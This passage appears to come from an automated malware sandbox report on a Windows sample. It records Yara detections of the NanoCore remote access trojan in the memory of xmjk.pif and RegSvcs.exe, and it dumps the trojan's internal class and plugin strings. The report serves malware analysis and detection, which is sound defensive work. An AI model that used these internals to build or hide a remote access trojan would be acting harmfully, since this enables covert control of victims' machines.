        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00CB9D99
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CBE34B cpuid 0_2_00CBE34B
        Source: C:\Users\user\31956653\xmjk.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CBCBB8 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,0_2_00CBCBB8
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0040E284 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,4_2_0040E284
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_00462BF9 GetUserNameW,13_2_00462BF9
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CAA995 GetVersionExW,0_2_00CAA995

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 20.3.xmjk.pif.4d3c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.60b0000.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.44cb041.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.3f3b041.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.60b0000.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3df3078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4c69c50.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.4537078.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4c9e458.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.b00000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.60b4629.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.44ce068.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4cd3078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3d55448.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4cd3078.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.4465058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3e5c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4d3c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.4537078.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3d89c50.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.44c560b.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.3f3b041.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4cd3078.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4cd3078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.3f3560b.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4c69c50.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.44cb041.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3e5c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3e5c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3e5c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3df3078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.4465058.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4d3c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4d3c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.bc0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4c35448.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.3f307ce.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.44ce068.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3dbe458.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3d89c50.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.44c07ce.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411798480.0000000003E28000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.412888978.0000000003E28000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394776495.0000000004C6A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352276623.00000000044CE000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411513032.0000000003D56000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394077058.0000000003EA4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.395083059.0000000004C36000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411892507.0000000003E5C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.414829262.0000000003D56000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352230581.00000000044CE000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411602320.0000000003DBF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.392253067.0000000004CD4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.412949182.00000000005A6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.414560875.0000000003DF3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352180992.0000000004466000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.439114989.0000000000752000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352056687.000000000449A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391774753.0000000004C36000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411727538.0000000003DF4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391477356.0000000004C9F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.414304073.0000000003D8A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391366953.0000000004C36000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.351507345.0000000004503000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350312058.0000000004431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350212865.0000000003748000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.413709722.0000000003DBF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.392467054.0000000004D08000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411158873.0000000003D56000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.395194489.0000000004C01000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350502878.0000000004503000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.581022172.00000000060B0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391714719.0000000004C6A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.576672734.0000000002EE1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.573655036.0000000000B02000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394033269.0000000004D08000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.579331613.0000000003F29000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.440127421.0000000003E89000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350252312.0000000004466000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352384580.0000000004431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411291828.0000000003DBF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391833117.0000000004C9F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411683482.0000000003DF4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391948004.0000000004CD4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.418761309.0000000004479000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391514426.0000000004C01000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411424843.0000000003D8A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352498016.0000000003748000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.415517736.0000000000BC2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.392573341.0000000004D3C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394945613.0000000004CD3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.415163976.0000000003D21000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394535307.0000000004C9F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411346377.0000000003D21000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.440034174.0000000002E81000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: xmjk.pif PID: 6660, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5792, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: xmjk.pif PID: 4356, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: xmjk.pif PID: 3412, type: MEMORYSTR
        Source: xmjk.pifBinary or memory string: WIN_XP
        Source: xmjk.pifBinary or memory string: WIN_XPe
        Source: xmjk.pifBinary or memory string: WIN_VISTA
        Source: xmjk.pif, 0000001B.00000000.396587647.0000000000472000.00000002.00020000.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte!
        Source: xmjk.pifBinary or memory string: WIN_7
        Source: xmjk.pifBinary or memory string: WIN_8

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: xmjk.pif, 00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 00000006.00000002.576672734.0000000002EE1000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 00000006.00000002.576672734.0000000002EE1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: RegSvcs.exe, 00000006.00000002.576672734.0000000002EE1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
        Source: xmjk.pif, 00000014.00000003.394776495.0000000004C6A000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: RegSvcs.exe, 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
        Source: xmjk.pif, 0000001B.00000003.411798480.0000000003E28000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 20.3.xmjk.pif.4d3c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.60b0000.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.44cb041.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.3f3b041.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.60b0000.11.unpack, type: UNPACKEDPE
